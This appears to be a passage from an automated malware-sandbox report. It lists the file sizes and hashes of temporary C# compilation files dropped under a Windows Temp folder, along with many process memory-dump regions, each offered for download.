\??\c:\Users\Admin\AppData\Local\Temp\0nwdqkbe\0nwdqkbe.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0nwdqkbe\0nwdqkbe.cmdline

Filesize
607B

MD5
7e2c00b5c7df42cbbc7927596b6e29a3

SHA1
3016c3e0f3f2b0f48db1e73fd4c50478af09b160

SHA256
3100dd9fcbf52f08e85309a28b52382c7f6f5a49c0b3e97d75c9784f01ed1614

SHA512
b8855d95899d743ad9291cba4c0c82cd99ee33676cd0dcb0311eba18dee0c95aca15c0d57f9aa65dd168380668a8480ebef12defaa4da324503ad5bdbeb712cc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0nwdqkbe\CSC9B64D16CA45744F6B43ECD5D4271E2A6.TMP

Filesize
652B

MD5
03754d0eec018fddeae81b21612175f3

SHA1
58c9a8016b8ca3856f54c87e96bfd823ffcac0c3

SHA256
9a5a2d70af1506cfd7601d96ace04ab4b6e567b4bbfecc480120cd10d95e5a4e

SHA512
371cb84557f62a1634138c115d69d6581d7c25aaf0093536675361f8fc13204cbf6f4d95dcb3730fd9cc527b5a44e1ff41edb65233a594570d33ce34fb7d392b

Download Submit
memory/4272-485-0x00000270D3E10000-0x00000270D3E20000-memory.dmp

Filesize
64KB

Download
memory/4272-488-0x00007FFECC4F0000-0x00007FFECCFB1000-memory.dmp

Filesize
10.8MB

Download
memory/4272-487-0x00000270D3E10000-0x00000270D3E20000-memory.dmp

Filesize
64KB

Download
memory/4272-484-0x00007FFECC4F0000-0x00007FFECCFB1000-memory.dmp

Filesize
10.8MB

Download
memory/4272-574-0x00000270D3E10000-0x00000270D3E20000-memory.dmp

Filesize
64KB

Download
memory/5556-239-0x000002ABECDF0000-0x000002ABECE00000-memory.dmp

Filesize
64KB

Download
memory/5556-249-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/5556-368-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/5564-173-0x000001C44C8B0000-0x000001C44C8C0000-memory.dmp

Filesize
64KB

Download
memory/5564-172-0x000001C44C8B0000-0x000001C44C8C0000-memory.dmp

Filesize
64KB

Download
memory/5564-217-0x000001C434740000-0x000001C434762000-memory.dmp

Filesize
136KB

Download
memory/5564-361-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/5564-171-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/5732-364-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/5732-238-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/5732-174-0x0000027124740000-0x0000027124750000-memory.dmp

Filesize
64KB

Download
memory/5896-502-0x00007FFECC4F0000-0x00007FFECCFB1000-memory.dmp

Filesize
10.8MB

Download
memory/5896-500-0x000002429BED0000-0x000002429BEE0000-memory.dmp

Filesize
64KB

Download
memory/5896-495-0x000002429BED0000-0x000002429BEE0000-memory.dmp

Filesize
64KB

Download
memory/5896-494-0x00007FFECC4F0000-0x00007FFECCFB1000-memory.dmp

Filesize
10.8MB

Download
memory/5968-608-0x00007FFEE1F00000-0x00007FFEE1F17000-memory.dmp

Filesize
92KB

Download
memory/5968-145-0x00007FFEE1DD0000-0x00007FFEE1DDD000-memory.dmp

Filesize
52KB

Download
memory/5968-160-0x00000172DED10000-0x00000172DF088000-memory.dmp

Filesize
3.5MB

Download
memory/5968-166-0x00007FFECD800000-0x00007FFECD91C000-memory.dmp

Filesize
1.1MB

Download
memory/5968-165-0x00007FFEE16D0000-0x00007FFEE16DD000-memory.dmp

Filesize
52KB

Download
memory/5968-155-0x00007FFECDD80000-0x00007FFECDDAE000-memory.dmp

Filesize
184KB

Download
memory/5968-154-0x00007FFECD940000-0x00007FFECDCB8000-memory.dmp

Filesize
3.5MB

Download
memory/5968-401-0x00007FFECDDB0000-0x00007FFECDF27000-memory.dmp

Filesize
1.5MB

Download
memory/5968-417-0x00007FFED0500000-0x00007FFED0519000-memory.dmp

Filesize
100KB

Download
memory/5968-418-0x00007FFECDCC0000-0x00007FFECDD78000-memory.dmp

Filesize
736KB

Download
memory/5968-153-0x00007FFECDCC0000-0x00007FFECDD78000-memory.dmp

Filesize
736KB

Download
memory/5968-315-0x00007FFECDF30000-0x00007FFECDF53000-memory.dmp

Filesize
140KB

Download
memory/5968-430-0x00007FFECD940000-0x00007FFECDCB8000-memory.dmp

Filesize
3.5MB

Download
memory/5968-607-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp

Filesize
5.9MB

Download
memory/5968-432-0x00000172DED10000-0x00000172DF088000-memory.dmp

Filesize
3.5MB

Download
memory/5968-575-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp

Filesize
5.9MB

Download
memory/5968-435-0x00007FFECDD80000-0x00007FFECDDAE000-memory.dmp

Filesize
184KB

Download
memory/5968-168-0x00007FFECD920000-0x00007FFECD934000-memory.dmp

Filesize
80KB

Download
memory/5968-142-0x00007FFED0500000-0x00007FFED0519000-memory.dmp

Filesize
100KB

Download
memory/5968-134-0x00007FFEE1590000-0x00007FFEE15A9000-memory.dmp

Filesize
100KB

Download
memory/5968-139-0x00007FFECDDB0000-0x00007FFECDF27000-memory.dmp

Filesize
1.5MB

Download
memory/5968-459-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp

Filesize
5.9MB

Download
memory/5968-461-0x00007FFED0260000-0x00007FFED0283000-memory.dmp

Filesize
140KB

Download
memory/5968-466-0x00007FFECDDB0000-0x00007FFECDF27000-memory.dmp

Filesize
1.5MB

Download
memory/5968-137-0x00007FFECDF30000-0x00007FFECDF53000-memory.dmp

Filesize
140KB

Download
memory/5968-130-0x00007FFECDF60000-0x00007FFECDF8D000-memory.dmp

Filesize
180KB

Download
memory/5968-116-0x00007FFEE1F00000-0x00007FFEE1F17000-memory.dmp

Filesize
92KB

Download
memory/5968-123-0x00007FFEE1EF0000-0x00007FFEE1EFF000-memory.dmp

Filesize
60KB

Download
memory/5968-167-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp

Filesize
5.9MB

Download
memory/5968-170-0x00007FFEE1F00000-0x00007FFEE1F17000-memory.dmp

Filesize
92KB

Download
memory/5968-175-0x00007FFED0260000-0x00007FFED0283000-memory.dmp

Filesize
140KB

Download
memory/5968-528-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp

Filesize
5.9MB

Download
memory/5968-121-0x00007FFED0260000-0x00007FFED0283000-memory.dmp

Filesize
140KB

Download
memory/5968-112-0x00007FFECDF90000-0x00007FFECE579000-memory.dmp

Filesize
5.9MB

Download
memory/6364-314-0x0000021AD48D0000-0x0000021AD48E0000-memory.dmp

Filesize
64KB

Download
memory/6364-264-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/6364-340-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/6408-356-0x0000020EBF0D0000-0x0000020EBFB91000-memory.dmp

Filesize
10.8MB

Download
memory/6472-316-0x000001B47E570000-0x000001B47E580000-memory.dmp

Filesize
64KB

Download
memory/6472-447-0x000001974CC00000-0x000001974CC10000-memory.dmp

Filesize
64KB

Download
memory/6472-446-0x00007FFED1E40000-0x00007FFED2901000-memory.dmp

Filesize
10.8MB

Download
memory/6472-449-0x00007FFED1E40000-0x00007FFED2901000-memory.dmp

Filesize
10.8MB

Download
memory/6472-259-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/6472-310-0x000001B47E570000-0x000001B47E580000-memory.dmp

Filesize
64KB

Download
memory/6472-372-0x00007FFECCBF0000-0x00007FFECD6B1000-memory.dmp

Filesize
10.8MB

Download
memory/6472-363-0x000001B47EC70000-0x000001B47EC78000-memory.dmp

Filesize
32KB

Download
memory/6960-434-0x00007FFED1E40000-0x00007FFED2901000-memory.dmp

Filesize
10.8MB

Download
memory/6960-428-0x00007FFED1E40000-0x00007FFED2901000-memory.dmp

Filesize
10.8MB

Download
memory/6960-429-0x0000029176E20000-0x0000029176E30000-memory.dmp

Filesize
64KB

Download
memory/6960-433-0x0000029176E20000-0x0000029176E30000-memory.dmp

Filesize
64KB

Download